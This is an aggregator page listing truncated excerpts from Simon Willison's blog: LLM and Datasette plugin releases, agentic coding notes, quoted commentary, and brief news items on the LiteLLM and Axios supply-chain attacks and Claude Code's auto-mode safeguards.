🔭AI Tools Scout

Data updated every 6 hours.

AI Content Hub

Curated tutorials, research, and news from 8 authors.

Content data last synced 5d ago. Expected every 6h.

Highlights from my conversation about agentic engineering on Lenny's Podcast

I was a guest on Lenny Rachitsky's podcast, in a new episode titled "An AI state of the union: We've passed the inflection point, dark factories are coming, and automation timelines". It's available on YouTube, Spotify, and Apple Podcasts. Here are my highlights from our conversation, with relevant links: The November inflection point; Software engineers as bellwethers for other information workers; Writing code on my phone; Responsible vibe coding; Dark Factories and StrongDM; The bot

Simon Willisonblog

Live blog: Code w/ Claude 2026

I'm at Anthropic's Code w/ Claude event today. Here's my live blog of the morning keynote sessions. Tags: ai, generative-ai, llms, anthropic, claude, claude-code, live-blog

Simon Willisonblog

llm-gemini 0.30

Release: llm-gemini 0.30 New models gemini-3.1-flash-lite-preview, gemma-4-26b-a4b-it and gemma-4-31b-it. See my notes on Gemma 4. Tags: gemini, llm, gemma

Simon Willisonblog

Gemma 4: Byte for byte, the most capable open models

Gemma 4: Byte for byte, the most capable open models Four new vision-capable Apache 2.0 licensed reasoning LLMs from Google DeepMind, sized at 2B, 4B, 31B, plus a 26B-A4B Mixture-of-Experts. Google emphasize "unprecedented level of intelligence-per-parameter", providing yet more evidence that creating small useful models is one of the hottest areas of research right now. They actually label the two smaller models as E2B and E4B for "Effective" parameter size. The system card explains: The small

Simon Willisonblog

Vibe coding and agentic engineering are getting closer than I'd like

I recently talked with Joseph Ruscio about AI coding tools for Heavybit's High Leverage podcast: Ep. #9, The AI Coding Paradigm Shift with Simon Willison. Here are some of my highlights, including my disturbing realization that vibe coding and agentic engineering have started to converge in my own work. One thing I really enjoy about podcasts is that they sometimes push me to think out loud in a way that exposes an idea I've not previously been able to put into words. Vibe coding and agentic eng

Simon Willisonblog

March 2026 sponsors-only newsletter

I just sent the March edition of my sponsors-only monthly newsletter. If you are a sponsor (or if you start a sponsorship now) you can access it here. In this month's newsletter: More agentic engineering patterns; Streaming experts with MoE models on a Mac; Model releases in March; Vibe porting; Supply chain attacks against PyPI and NPM; Stuff I shipped; What I'm using, March 2026 edition; And a couple of museums. Here's a copy of the February newsletter as a preview of what you'll get. Pay $10/month

Simon Willisonblog

datasette-referrer-policy 0.1

Release: datasette-referrer-policy 0.1 The OpenStreetMap tiles on the Datasette global-power-plants demo weren't displaying correctly. This turned out to be caused by two bugs. The first is that the CAPTCHA I added to that site a few weeks ago was triggering for the .json fetch requests used by the map plugin, and since those weren't HTML the user was not being asked to solve them. Here's the fix. The second was that OpenStreetMap quite reasonably block tile requests from sites that use

Simon Willisonblog

Our AI started a cafe in Stockholm

Our AI started a cafe in Stockholm Andon Labs previously started an AI-run retail store in San Francisco. Now they're running a similar experiment in Stockholm, Sweden, only this time it's a cafe. These experiments are interesting, and often throw out amusing anecdotes: During the first week of inventory, Mona ordered 120 eggs even though the café has no stove. When the staff told her they couldn’t cook them, she suggested using the high-speed oven, until they pointed out the eggs would likely

Simon Willisonblog

datasette-llm 0.1a6

Release: datasette-llm 0.1a6 The same model ID no longer needs to be repeated in both the default model and allowed models lists - setting it as a default model automatically adds it to the allowed models list. #6 Improved documentation for Python API usage. Tags: llm, datasette

Simon Willisonblog

datasette-enrichments-llm 0.2a1

Release: datasette-enrichments-llm 0.2a1 The actor who triggers an enrichment is now passed to the llm.model(... actor=actor) method. #3 Tags: enrichments, llm, datasette

Simon Willisonblog

LiteLLM Hack: Were You One of the 47,000?

LiteLLM Hack: Were You One of the 47,000? Daniel Hnyk used the BigQuery PyPI dataset to determine how many downloads there were of the exploited LiteLLM packages during the 46 minute period they were live on PyPI. The answer was 46,996 across the two compromised release versions (1.82.7 and 1.82.8). They also identified 2,337 packages that depended on LiteLLM - 88% of which did not pin versions in a way that would have avoided the exploited version. Via @hnykda Tags: packaging, pypi,

Simon Willisonblog

datasette-llm 0.1a7

Release: datasette-llm 0.1a7 Mechanism for configuring default options for specific models. Part of Datasette's evolving support mechanism for plugins that use LLMs. It's now possible to configure a model with default options, e.g. to say all enrichment operations should use a specific model with temperature set to 0.5. Tags: llm, datasette

Simon Willisonblog

llm-echo 0.5a0

Release: llm-echo 0.5a0 New -o thinking 1 option to help test against LLM 0.32a0 and higher. This plugin provides a fake model called "echo" for LLM which doesn't run an LLM at all - it's useful for writing automated tests. You can now do this: uvx --with llm==0.32a1 --with llm-echo==0.5a0 llm -m echo hi -o thinking 1 This will fake a reasoning block to standard error before returning JSON echoing the prompt. Tags: llm

Simon Willisonblog

Auto mode for Claude Code

Auto mode for Claude Code Really interesting new development in Claude Code today as an alternative to --dangerously-skip-permissions: Today, we're introducing auto mode, a new permissions mode in Claude Code where Claude makes permission decisions on your behalf, with safeguards monitoring actions before they run. Those safeguards appear to be implemented using Claude Sonnet 4.6, as described in the documentation: Before each action runs, a separate classifier model reviews the conversation

Simon Willisonblog

Quoting John Gruber

So it’s well known that Y Combinator owns some stake in OpenAI. But how big is that stake? This seems like devilishly difficult information to obtain. I asked around and a little birdie who knows several OpenAI investors came back with an answer: Y Combinator owns about 0.6 percent of OpenAI. At OpenAI’s current $852 billion valuation, that’s worth over $5 billion. — John Gruber, Y Combinator’s Stake in OpenAI Tags: openai, y-combinator, ai, john-gruber

Simon Willisonblog

Granite 4.1 3B SVG Pelican Gallery

Granite 4.1 3B SVG Pelican Gallery IBM released their Granite 4.1 family of LLMs a few days ago. They're Apache 2.0 licensed and come in 3B, 8B and 30B sizes. Granite 4.1 LLMs: How They’re Built by Granite team member Yousaf Shah describes the training process in detail. Unsloth released the unsloth/granite-4.1-3b-GGUF collection of GGUF encoded quantized variants of the 3B model - 21 different model files ranging in size from 1.2GB to 6.34GB. All 21 of those Unsloth files add up to 51.3GB, whic

Simon Willisonblog

datasette-extract 0.3a0

Release: datasette-extract 0.3a0 Now uses datasette-llm to manage model configuration, which means you can control which models are available for extraction tasks using the extract purpose and LLM model configuration. #38 Tags: llm, datasette

Simon Willisonblog

datasette-enrichments-llm 0.2a0

Release: datasette-enrichments-llm 0.2a0 This plugin now uses datasette-llm to configure and manage models. This means it's possible to specify which models should be made available for enrichments, using the new enrichments purpose. Tags: llm, datasette

Simon Willisonblog

datasette-llm-usage 0.2a0

Release: datasette-llm-usage 0.2a0 Removed features relating to allowances and estimated pricing. These are now the domain of datasette-llm-accountant. Now depends on datasette-llm for model configuration. #3 Full prompts and responses and tool calls can now be logged to the llm_usage_prompt_log table in the internal database if you set the new datasette-llm-usage.log_prompts plugin configuration setting. Redesigned the /-/llm-usage-simple-prompt page, which now requires the llm-usage-simp

Simon Willisonblog

datasette-llm 0.1a5

Release: datasette-llm 0.1a5 The llm_prompt_context() plugin hook wrapper mechanism now tracks prompts executed within a chain as well as one-off prompts, which means it can be used to track tool call loops. #5 Tags: llm, datasette

Simon Willisonblog

Quoting Andy Masley

[...] Between 2000 and 2024, farmers sold in total a Colorado-sized chunk of land all on their own, 77 times all land on data center property in 2028, and grew more food than ever on what was left. None of this caused any problems for US food access. And then, in the middle of all this, a farmer in Loudoun County sells a few acres of mediocre hay field to a hyperscaler for ten times its agricultural value, and the response is that we’re running out of farmland. — Andy Masley, pushing back

Simon Willisonblog

April 2026 newsletter

I just sent out the April edition of my sponsors-only monthly newsletter. If you are a sponsor (or if you start a sponsorship now) you can access it here. In this month's newsletter: Opus 4.7 and GPT-5.5, both with price increases; Claude Mythos and LLM security research; ChatGPT Images 2.0; More model releases; Other highlights from my blog; What I'm using, April 2026 edition. Here's a copy of the March newsletter as a preview of what you'll get. Pay $10/month to stay a month ahead of the free copy

Simon Willisonblog

Quoting Soohoon Choi

I want to argue that AI models will write good code because of economic incentives. Good code is cheaper to generate and maintain. Competition is high between the AI models right now, and the ones that win will help developers ship reliable features fastest, which requires simple, maintainable code. Good code will prevail, not only because we want it to (though we do!), but because economic forces demand it. Markets will not reward slop in coding, in the long-term. — Soohoon Choi, Slop Is

Simon Willisonblog

Package Managers Need to Cool Down

Package Managers Need to Cool Down Today's LiteLLM supply chain attack inspired me to revisit the idea of dependency cooldowns, the practice of only installing updated dependencies once they've been out in the wild for a few days to give the community a chance to spot if they've been subverted in some way. This recent piece (March 4th) by Andrew Nesbitt reviews the current state of dependency cooldown mechanisms across different packaging tools. It's surprisingly well supported! There's be

Simon Willisonblog
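The dependency cooldown idea in the item above comes down to an age check on each release. Here is a minimal sketch, not taken from the post or from any specific packaging tool: the helper names, the 7-day window, and the shape of the `releases` mapping are all assumptions made for illustration.

```python
from datetime import datetime, timedelta, timezone


def is_cooled_down(uploaded_at, now, min_age_days=7):
    """Return True if a release has been public for at least min_age_days."""
    return now - uploaded_at >= timedelta(days=min_age_days)


def newest_allowed(releases, now, min_age_days=7):
    """Pick the most recently uploaded release that has passed the cooldown.

    `releases` maps version strings to upload datetimes (hypothetical shape).
    Returns None when every release is still inside the cooldown window.
    """
    eligible = {
        version: uploaded_at
        for version, uploaded_at in releases.items()
        if is_cooled_down(uploaded_at, now, min_age_days)
    }
    if not eligible:
        return None
    return max(eligible, key=eligible.get)


if __name__ == "__main__":
    now = datetime.now(timezone.utc)
    releases = {
        "1.0.0": now - timedelta(days=30),
        "1.0.1": now - timedelta(hours=1),  # too fresh to trust yet
    }
    print(newest_allowed(releases, now))
```

A release that was live for only minutes before being pulled would never become eligible under a check like this, which is the point of the practice.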

Quoting Christopher Mims

I really think "give AI total control of my computer and therefore my entire life" is going to look so foolish in retrospect that everyone who went for this is going to look as dumb as Jimmy Fallon holding up a picture of his Bored Ape — Christopher Mims, Technology columnist at The Wall Street Journal Tags: ai, security

Simon Willisonblog

Supply Chain Attack on Axios Pulls Malicious Dependency from npm

Supply Chain Attack on Axios Pulls Malicious Dependency from npm Useful writeup of today's supply chain attack against Axios, the HTTP client NPM package with 101 million weekly downloads. Versions 1.14.1 and 0.30.4 both included a new dependency called plain-crypto-js which was freshly published malware, stealing credentials and installing a remote access trojan (RAT). It looks like the attack came from a leaked long-lived npm token. Axios have an open issue to adopt trusted publishing, which w

Simon Willisonblog

TRE Python binding — ReDoS robustness demo

Research: TRE Python binding — ReDoS robustness demo If it's good enough for antirez to add to Redis I figured Ville Laurikari's TRE regular expression engine was worth exploring in a little more detail. I had Claude Code build an experimental Python binding (it used ctypes) and try some malicious regular expression attacks against the library. TRE handles those much better than Python's standard library implementation, thanks mainly to the lack of support for backtracking.

Simon Willisonblog
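To make the backtracking problem mentioned in the item above concrete, here is a small sketch that uses only Python's standard `re` module. It is not the TRE binding or the demo from the research post; the pattern and input sizes are illustrative choices.

```python
import re
import time

# Nested quantifiers force a backtracking engine to try exponentially many
# ways of splitting the run of "a" characters before it can report failure.
EVIL_PATTERN = re.compile(r"(a+)+$")


def time_failed_match(n):
    """Time how long `re` takes to reject n 'a' characters followed by '!'."""
    text = "a" * n + "!"
    start = time.perf_counter()
    result = EVIL_PATTERN.match(text)
    elapsed = time.perf_counter() - start
    return result, elapsed


if __name__ == "__main__":
    # Keep n small: each extra character roughly doubles the work.
    for n in (10, 14, 18):
        result, elapsed = time_failed_match(n)
        print(f"n={n:2d} matched={result is not None} seconds={elapsed:.4f}")
```

An engine that does not backtrack should reject the same inputs in time that grows roughly linearly with their length.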

datasette-llm 0.1a4

Release: datasette-llm 0.1a4 Ability to configure different API keys for models based on their purpose - for example, set it up so enrichments always use gpt-5.4-mini with an API key dedicated to that purpose. #4 I released llm-echo 0.3 to provide an API key testing utility I needed for the tests for this new feature. Tags: llm, datasette

Simon Willisonblog

llm-all-models-async 0.1

Release: llm-all-models-async 0.1 LLM plugins can define new models in both sync and async varieties. The async variants are most common for API-backed models - sync variants tend to be things that run the model directly within the plugin. My llm-mrchatterbox plugin is sync only. I wanted to try it out with various Datasette LLM features (specifically datasette-enrichments-llm) but Datasette can only use async models. So... I had Claude spin up this plugin that turns sync models into async m

Simon Willisonblog

llm 0.30

Release: llm 0.30 The register_models() plugin hook now takes an optional model_aliases parameter listing all of the models, async models and aliases that have been registered so far by other plugins. A plugin with @hookimpl(trylast=True) can use this to take previously registered models into account. #1389 Added docstrings to public classes and methods and included those directly in the documentation. Tags: llm

Simon Willisonblog

Redis Array Playground

Tool: Redis Array Playground Salvatore Sanfilippo submitted a PR adding a new data type - arrays - to Redis. The new commands are ARCOUNT, ARDEL, ARDELRANGE, ARGET, ARGETRANGE, ARGREP, ARINFO, ARINSERT, ARLASTITEMS, ARLEN, ARMGET, ARMSET, ARNEXT, AROP, ARRING, ARSCAN, ARSEEK, ARSET. The implementation is currently available in a branch, so I had Claude Code for web build this interactive playground for trying out the new commands in a WASM-compiled build of a subset of Redis running in

Simon Willisonblog

Malicious litellm_init.pth in litellm 1.82.8 — credential stealer

Malicious litellm_init.pth in litellm 1.82.8 — credential stealer The LiteLLM v1.82.8 package published to PyPI was compromised with a particularly nasty credential stealer hidden in base64 in a litellm_init.pth file, which means installing the package is enough to trigger it even without running import litellm. (1.82.7 had the exploit as well but it was in the proxy/proxy_server.py file so the package had to be imported for it to take effect.) This issue has a very detailed description of what

Simon Willisonblog
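The reason a `.pth` file is enough to trigger code, as described in the item above, is that Python's `site` module executes any line in a `.pth` file that starts with `import`. The sketch below demonstrates that mechanism with a harmless payload in a temporary directory; the file name `demo_init.pth` and the `PTH_DEMO` variable are made up for illustration and have nothing to do with the real malware.

```python
import os
import site
import sys
import tempfile


def demo_pth_execution():
    """Show that a .pth line starting with 'import' runs without importing any package."""
    os.environ.pop("PTH_DEMO", None)
    saved_path = list(sys.path)
    try:
        with tempfile.TemporaryDirectory() as sitedir:
            pth_path = os.path.join(sitedir, "demo_init.pth")
            with open(pth_path, "w") as f:
                # Harmless payload: set an environment variable.
                f.write("import os; os.environ['PTH_DEMO'] = 'ran'\n")
            # addsitedir() processes .pth files the way site-packages
            # directories are processed at interpreter startup.
            site.addsitedir(sitedir)
    finally:
        # Undo the sys.path change made by addsitedir().
        sys.path[:] = saved_path
    return os.environ.get("PTH_DEMO")


if __name__ == "__main__":
    print(demo_pth_execution())
```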

llm-echo 0.4

Release: llm-echo 0.4 Prompts now have the input_tokens and output_tokens fields populated on the response. Tags: llm

Simon Willisonblog

llm-echo 0.3

Release: llm-echo 0.3 Mechanisms for testing tool calls. #3 Mechanism for testing raw responses. #4 New echo-needs-key model for testing model key logic. #7 Tags: llm

Simon Willisonblog

Streaming experts

I wrote about Dan Woods' experiments with streaming experts the other day, the trick where you run larger Mixture-of-Experts models on hardware that doesn't have enough RAM to fit the entire model by instead streaming the necessary expert weights from SSD for each token that you process. Five days ago Dan was running Qwen3.5-397B-A17B in 48GB of RAM. Today @seikixtc reported running the colossal Kimi K2.5 - a 1 trillion parameter model with 32B active weights at any one time, in 96GB of RAM on a

Simon Willisonblog

Quoting Neurotica

slop is something that takes more human effort to consume than it took to produce. When my coworker sends me raw Gemini output he’s not expressing his freedom to create, he’s disrespecting the value of my time — Neurotica, @schwarzgerat.bsky.social Tags: ai-ethics, slop, generative-ai, ai, llms

Simon Willisonblog

datasette-files 0.1a2

Release: datasette-files 0.1a2 The most interesting alpha of datasette-files yet, a new plugin which adds the ability to upload files directly into a Datasette instance. Here are the release notes in full: Columns are now configured using the new column_types system from Datasette 1.0a26. #8 New file_actions plugin hook, plus ability to import an uploaded CSV/TSV file to a table. #10 UI for uploading multiple files at once via the new documented JSON upload API. #11 Thumbnails are now gene

Simon Willisonblog

datasette-files 0.1a3

Release: datasette-files 0.1a3 I'm working on integrating datasette-files into other plugins, such as datasette-extract. This necessitated a new release of the base plugin. owners_can_edit and owners_can_delete configuration options, plus the files-edit and files-delete actions are now scoped to a new FileResource which is a child of FileSourceResource. #18 The file picker UI is now available as a <datasette-file-picker> Web Component. Thanks, Alex Garcia. #19 New from datasette_file

Simon Willisonblog

Quoting David Abram

I have been doing this for years, and the hardest parts of the job were never about typing out code. I have always struggled most with understanding systems, debugging things that made no sense, designing architectures that wouldn't collapse under heavy load, and making decisions that would save months of pain later. None of these problems can be solved by LLMs. They can suggest code, help with boilerplate, sometimes can act as a sounding board. But they don't understand the system, they don't carr

Simon Willisonblog

Quoting Georgi Gerganov

Note that the main issues that people currently unknowingly face with local models mostly revolve around the harness and some intricacies around model chat templates and prompt construction. Sometimes there are even pure inference bugs. From typing the task in the client to the actual result, there is a long chain of components that atm are not only fragile - are also developed by different parties. So it's difficult to consolidate the entire stack and you have to keep in mind that what you are

Simon Willisonblog

datasette-llm 0.1a3

Release: datasette-llm 0.1a3 Adds the ability to configure which LLMs are available for which purpose, which means you can restrict the list of models that can be used with a specific plugin. #3 Tags: llm, datasette

Simon Willisonblog

Quoting Anthropic

We used an automatic classifier which judged sycophancy by looking at whether Claude showed a willingness to push back, maintain positions when challenged, give praise proportional to the merit of ideas, and speak frankly regardless of what a person wants to hear. Most of the time in these situations, Claude expressed no sycophancy—only 9% of conversations included sycophantic behavior (Figure 2). But two domains were exceptions: we saw sycophantic behavior in 38% of conversations focused on spi

Simon Willisonblog

Mr. Chatterbox is a (weak) Victorian-era ethically trained model you can run on your own computer

Trip Venturella released Mr. Chatterbox, a language model trained entirely on out-of-copyright text from the British Library. Here's how he describes it in the model card: Mr. Chatterbox is a language model trained entirely from scratch on a corpus of over 28,000 Victorian-era British texts published between 1837 and 1899, drawn from a dataset made available by the British Library. The model has absolutely no training inputs from after 1899 — the vocabulary and ideas are formed exclusively from

Simon Willisonblog

Beats now have notes

Last month I added a feature I call beats to this blog, pulling in some of my other content from external sources and including it on the homepage, search and various archive pages on the site. On any given day these frequently outnumber my regular posts. They were looking a little bit thin and were lacking any form of explanation beyond a link, so I've added the ability to annotate them with a "note" which now shows up as part of their display. Here's what that looks like for the content I publ

Simon Willisonblog

Starlette 1.0 skill

Research: Starlette 1.0 skill See Experimenting with Starlette 1.0 with Claude skills. Tags: starlette

Simon Willisonblog

Experimenting with Starlette 1.0 with Claude skills

Starlette 1.0 is out! This is a really big deal. I think Starlette may be the Python framework with the most usage compared to its relatively low brand recognition because Starlette is the foundation of FastAPI, which has attracted a huge amount of buzz that seems to have overshadowed Starlette itself. Kim Christie started working on Starlette in 2018 and it quickly became my favorite out of the new breed of Python ASGI frameworks. The only reason I didn't use it as the basis for my own Datasett

Simon Willisonblog

PCGamer Article Performance Audit

Research: PCGamer Article Performance Audit Stuart Breckenridge pointed out that PC Gamer Recommends RSS Readers in a 37MB Article That Just Keeps Downloading, highlighting a truly horrifying example of web bloat that added up to 100s more MBs thanks to auto-playing video ads. I decided to have Claude Code for web use Rodney to investigate the page - prompt here. Tags: web-performance, rodney

Simon Willisonblog

llm-mrchatterbox 0.1

Release: llm-mrchatterbox 0.1 See Mr. Chatterbox is a (weak) Victorian-era ethically trained model you can run on your own computer. Tags: llm

Simon Willisonblog

JavaScript Sandboxing Research

Research: JavaScript Sandboxing Research Aaron Harper wrote about Node.js worker threads, which inspired me to run a research task to see if they might help with running JavaScript in a sandbox. Claude Code went way beyond my initial question and produced a comparison of isolated-vm, vm2, quickjs-emscripten, QuickJS-NG, ShadowRealm, and Deno Workers. Tags: sandboxing, javascript, nodejs, claude-code

Simon Willisonblog

DNS Lookup

Tool: DNS Lookup TIL that Cloudflare's 1.1.1.1 DNS service (and 1.1.1.2 and 1.1.1.3, which block malware and malware + adult content respectively) has a CORS-enabled JSON API, so I had Claude Code build me a UI for running DNS queries against all three of those resolvers. Tags: dns, cors, cloudflare

Simon Willisonblog
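As a rough illustration of the kind of JSON API the DNS Lookup item above refers to, here is a sketch that builds DNS-over-HTTPS JSON requests with the standard library. The hostnames mapped to each resolver are assumptions and should be checked against Cloudflare's documentation, and this is not the code behind the tool itself.

```python
import json
import urllib.parse
import urllib.request

# Assumed DNS-over-HTTPS endpoints for the three resolvers.
RESOLVERS = {
    "1.1.1.1": "https://cloudflare-dns.com/dns-query",
    "1.1.1.2": "https://security.cloudflare-dns.com/dns-query",
    "1.1.1.3": "https://family.cloudflare-dns.com/dns-query",
}


def build_request(resolver, name, record_type="A"):
    """Build (but do not send) a JSON DNS query for one resolver."""
    query = urllib.parse.urlencode({"name": name, "type": record_type})
    return urllib.request.Request(
        f"{RESOLVERS[resolver]}?{query}",
        headers={"Accept": "application/dns-json"},
    )


def lookup(resolver, name, record_type="A"):
    """Send the query (needs network access) and return the decoded JSON."""
    request = build_request(resolver, name, record_type)
    with urllib.request.urlopen(request, timeout=10) as response:
        return json.load(response)


if __name__ == "__main__":
    for resolver in RESOLVERS:
        print(resolver, build_request(resolver, "example.com").full_url)
```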

Merge State Visualizer

Tool: Merge State Visualizer Bram Cohen wrote about his coherent vision for the future of version control using CRDTs, illustrated by 470 lines of Python. I fed that Python (minus comments) into Claude and asked for an explanation, then had it use Pyodide to build me an interactive UI for seeing how the algorithms work. Tags: vcs, pyodide, bram-cohen, crdt

Simon Willisonblog

Sightings

/elsewhere/sightings/ I have a new camera (a Canon R6 Mark II) so I'm taking a lot more photos of birds. I share my best wildlife photos on iNaturalist, and based on yesterday's successful prototype I decided to add those to my blog. I built this feature on my phone using Claude Code for web, as an extension of my beats system for syndicating external content. Here's the PR and prompt. As with my other forms of incoming syndicated content sightings show up on the homepage, the date archive pag

Simon Willisonblog

Pretext

Pretext Exciting new browser library from Cheng Lou, previously a React core developer and the original creator of the react-motion animation library. Pretext solves the problem of calculating the height of a paragraph of line-wrapped text without touching the DOM. The usual way of doing this is to render the text and measure its dimensions, but this is extremely expensive. Pretext uses an array of clever tricks to make this much, much faster, which enables all sorts of new text rendering effect

Simon Willisonblog

Pretext — Under the Hood

Tool: Pretext — Under the Hood See my notes on Pretext here.

Simon Willisonblog

Python Vulnerability Lookup

Tool: Python Vulnerability Lookup I learned that the OSV.dev open source vulnerability database has an open CORS JSON API, so I had Claude Code build this HTML tool for pasting in a pyproject.toml or requirements.txt file (or name of a GitHub repo containing those) and seeing a list of all reported vulnerabilities from that API. Tags: tools, python, supply-chain, vibe-coding, security

Simon Willisonblog
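The lookup described in the item above can be sketched in a few lines of Python. This is not the tool's own code (which is an HTML page); it assumes the OSV.dev `v1/query` endpoint and only handles simple `name==version` lines from a requirements.txt file.

```python
import json
import urllib.request

OSV_QUERY_URL = "https://api.osv.dev/v1/query"


def parse_pinned_requirements(text):
    """Extract (name, version) pairs from simple 'name==version' lines only."""
    pins = []
    for line in text.splitlines():
        # Drop comments and environment markers before looking for a pin.
        line = line.split("#", 1)[0].split(";", 1)[0].strip()
        if "==" in line:
            name, version = line.split("==", 1)
            pins.append((name.strip(), version.strip()))
    return pins


def build_osv_query(name, version):
    """Build the JSON body for a single package/version query."""
    return {"package": {"name": name, "ecosystem": "PyPI"}, "version": version}


def query_osv(name, version):
    """POST one query to OSV.dev (needs network access) and return the JSON."""
    data = json.dumps(build_osv_query(name, version)).encode("utf-8")
    request = urllib.request.Request(
        OSV_QUERY_URL, data=data, headers={"Content-Type": "application/json"}
    )
    with urllib.request.urlopen(request, timeout=10) as response:
        return json.load(response)


if __name__ == "__main__":
    for name, version in parse_pinned_requirements("requests==2.31.0\n"):
        print(build_osv_query(name, version))
```

Unpinned requirements such as `flask>=2.0` are skipped here because a vulnerability query needs a concrete version to check.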

Profiling Hacker News users based on their comments

Here's a mildly dystopian prompt I've been experimenting with recently: "Profile this user", accompanied by a copy of their last 1,000 comments on Hacker News. Obtaining those comments is easy. The Algolia Hacker News API supports listing comments sorted by date that have a specific tag, and the author of a comment is tagged there as author_username. Here's a JSON feed of my (simonw) most recent comments, for example: https://hn.algolia.com/api/v1/search_by_date?tags=comment,author_simonw&hi

Simon Willisonblog

Using Git with coding agents

Agentic Engineering Patterns > Git is a key tool for working with coding agents. Keeping code in version control lets us record how that code changes over time and investigate and reverse any mistakes. All of the coding agents are fluent in using Git's features, both basic and advanced. This fluency means we can be more ambitious about how we use Git ourselves. We don't need to memorize how to do things with Git, but staying aware of what's possible means we can take advantage of the ful

Simon Willisonblog

iNaturalist Sightings

Tool: iNaturalist Sightings I wanted to see my iNaturalist observations - across two separate accounts - grouped by when they occurred. I'm camping this weekend so I built this entirely on my phone using Claude Code for web. I started by building an inaturalist-clumper Python CLI for fetching and "clumping" observations - by default clumps use observations within 2 hours and 5km of each other. Then I set up simonw/inaturalist-clumps as a Git scraping repository to run that tool and record

Simon Willisonblog

Quoting Matt Webb

The thing about agentic coding is that agents grind problems into dust. Give an agent a problem and a while loop and - long term - it’ll solve that problem even if it means burning a trillion tokens and re-writing down to the silicon. [...] But we want AI agents to solve coding problems quickly and in a way that is maintainable and adaptive and composable (benefiting from improvements elsewhere), and where every addition makes the whole stack better. So at the bottom is really great libraries th

Simon Willisonblog

Turbo Pascal 3.02A, deconstructed

Turbo Pascal 3.02A, deconstructed In Things That Turbo Pascal is Smaller Than James Hague lists things (from 2011) that are larger in size than Borland's 1985 Turbo Pascal 3.02 executable - a 39,731 byte file that somehow included a full text editor IDE and Pascal compiler. This inspired me to track down a copy of that executable (available as freeware since 2000) and see if Claude could interpret the binary and decompile it for me. It did a great job, so I had it create this interactive artifac

Simon Willisonblog

Codex CLI 0.128.0 adds /goal

Codex CLI 0.128.0 adds /goal The latest version of OpenAI's Codex CLI coding agent adds their own version of the Ralph loop: you can now set a /goal and Codex will keep on looping until it evaluates that the goal has been completed... or the configured token budget has been exhausted. It looks like the feature is mainly implemented through the goals/continuation.md and goals/budget_limit.md prompts, which are automatically injected at the end of a turn. Via @fcoury Tags: ai, openai, pr

Simon Willisonblog

Our evaluation of OpenAI's GPT-5.5 cyber capabilities

Our evaluation of OpenAI's GPT-5.5 cyber capabilities The UK's AI Security Institute previously evaluated Claude Mythos: now they've evaluated GPT-5.5 for finding security vulnerabilities and found it to be comparable to Mythos, but unlike Mythos it's generally available right now. Tags: ai, openai, generative-ai, llms, anthropic, claude, ai-security-research, gpt

Simon Willisonblog

Quoting Andrew Kelley

It's a common misconception that we can't tell who is using LLM and who is not. I'm sure we didn't catch 100% of LLM-assisted PRs over the past few months, but the kind of mistakes humans make are fundamentally different than LLM hallucinations, making them easy to spot. Furthermore, people who come from the world of agentic coding have a certain digital smell that is not obvious to them but is obvious to those who abstain. It's like when a smoker walks into the room, everybody who doesn't smoke

Simon Willisonblog

Quoting Kimi.ai @Kimi_Moonshot

Congrats to the @cursor_ai team on the launch of Composer 2! We are proud to see Kimi-k2.5 provide the foundation. Seeing our model integrated effectively through Cursor's continued pretraining & high-compute RL training is the open model ecosystem we love to support. Note: Cursor accesses Kimi-k2.5 via @FireworksAI_HQ hosted RL and inference platform as part of an authorized commercial partnership. — Kimi.ai @Kimi_Moonshot, responding to reports that Composer 2 was built on top of Kim

Simon Willisonblog

datasette-showboat 0.1a2

Release: datasette-showboat 0.1a2 I added an option to export a Markdown file from my app that lets Showboat incrementally publish updates to a remote server.

Simon Willisonblog

We need RSS for sharing abundant vibe-coded apps

We need RSS for sharing abundant vibe-coded apps Matt Webb: I would love an RSS web feed for all those various tools and apps pages, each item with an “Install” button. (But install to where?) The lesson here is that when vibe-coding accelerates app development, apps become more personal, more situated, and more frequent. Shipping a tool or a micro-app is less like launching a website and more like posting on a blog. This inspired me to have Claude add an Atom feed (and icon) to my /elsewhere/

Simon Willisonblog

Quoting Richard Fontana

FWIW, IANDBL, TINLA, etc., I don’t currently see any basis for concluding that chardet 7.0.0 is required to be released under the LGPL. AFAIK no one including Mark Pilgrim has identified persistence of copyrightable expressive material from earlier versions in 7.0.0 nor has anyone articulated some viable alternate theory of license violation. [...] — Richard Fontana, LGPLv3 co-author, weighing in on the chardet relicensing situation Tags: open-source, ai-ethics, llms, ai, generative-a

Simon Willisonblog

Vibe coding SwiftUI apps is a lot of fun

I have a new laptop - a 128GB M5 MacBook Pro, which early impressions show to be very capable for running good local LLMs. I got frustrated with Activity Monitor and decided to vibe code up some alternative tools for monitoring performance and I'm very happy with the results. This is my second experiment with vibe coding macOS apps - the first was this presentation app a few weeks ago. It turns out Claude Opus 4.6 and GPT-5.4 are both very competent at SwiftUI - and a full SwiftUI app can fit in

Simon Willisonblog

My minute-by-minute response to the LiteLLM malware attack

My minute-by-minute response to the LiteLLM malware attack Callum McMahon reported the LiteLLM malware attack to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container: Confirmed. Fresh download from PyPI right now in an isolated Docker container: Inspecting: litellm-1.82.8-py3-none-any.whl FOUND: litellm_init.pth SI

Simon Willisonblog

Thoughts on slowing the fuck down

Thoughts on slowing the fuck down Mario Zechner created the Pi agent framework used by OpenClaw, giving considerable credibility to his opinions on current trends in agentic engineering. He's not impressed: We have basically given up all discipline and agency for a sort of addiction, where your highest goal is to produce the largest amount of code in the shortest amount of time. Consequences be damned. Agents and humans both make mistakes, but agent mistakes accumulate much faster: A human is

Simon Willisonblog

datasette-llm 0.1a1

Release: datasette-llm 0.1a1 New release of the base plugin that makes models from LLM available for use by other Datasette plugins such as datasette-enrichments-llm. New register_llm_purposes() plugin hook and get_purposes() function for retrieving registered purpose strings. #1 One of the responsibilities of this plugin is to configure which models are used for which purposes, so you can say in one place "data enrichment uses GPT-5.4-nano but SQL query assistance happens using Sonnet 4

Simon Willisonblog

Quantization from the ground up

Quantization from the ground up Sam Rose continues his streak of publishing spectacularly informative interactive essays, this time explaining how quantization of Large Language Models works (which he says might be "the best post I've ever made".) Also included is the best visual explanation I've ever seen of how floating point numbers are represented using binary digits. I hadn't heard about outlier values in quantization - rare float values that exist outside of the normal tiny-value distribu

Simon Willisonblog

SQLite Tags Benchmark: Comparing 5 Tagging Strategies

Research: SQLite Tags Benchmark: Comparing 5 Tagging Strategies I had Claude Code run a micro-benchmark comparing different approaches to implementing tagging in SQLite. Traditional many-to-many tables won, but FTS5 came a close second. Full table scans with LIKE queries performed better than I expected, but full table scans with JSON arrays and json_each() were much slower. Tags: json, sqlite

Simon Willisonblog
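
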